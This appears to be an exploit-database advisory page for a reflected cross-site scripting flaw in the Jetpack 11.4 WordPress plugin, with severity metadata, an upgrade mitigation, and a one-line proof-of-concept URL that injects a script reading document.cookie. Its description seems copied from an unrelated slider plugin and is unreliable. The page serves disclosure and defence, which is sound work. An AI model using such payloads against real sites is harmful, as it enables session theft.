header-logo
Suggest Exploit
vendor:
Jetpack
by:
Behrouz Mansoori
8.8
CVSS
HIGH
Cross Site Scripting (XSS)
79
CWE
Product Name: Jetpack
Affected Version From: 11.4
Affected Version To: 11.4
Patch Exists: YES
Related CWE:
CPE: wordpress.org/plugins/jetpack
Metasploit:
Other Scripts:
Platforms Tested: Mac m1
2022

Jetpack 11.4 – Cross Site Scripting (XSS)

This plugin creates a Jetpack from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting.

Mitigation:

Upgrade to version 11.5 or later.
Source

Exploit-DB raw data:

# Exploit Title: Jetpack 11.4 - Cross Site Scripting (XSS)
# Date: 2022-10-19
# Author: Behrouz Mansoori
# Software Link: https://wordpress.org/plugins/jetpack
# Version: 11.4
# Tested on: Mac m1
# CVE: N/A

1. Description:
This plugin creates a Jetpack from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting.

2. Proof of Concept:
http://localhost/modules/contact-form/grunion-form-view.php?post_id=<script>alert(document.cookie)</script>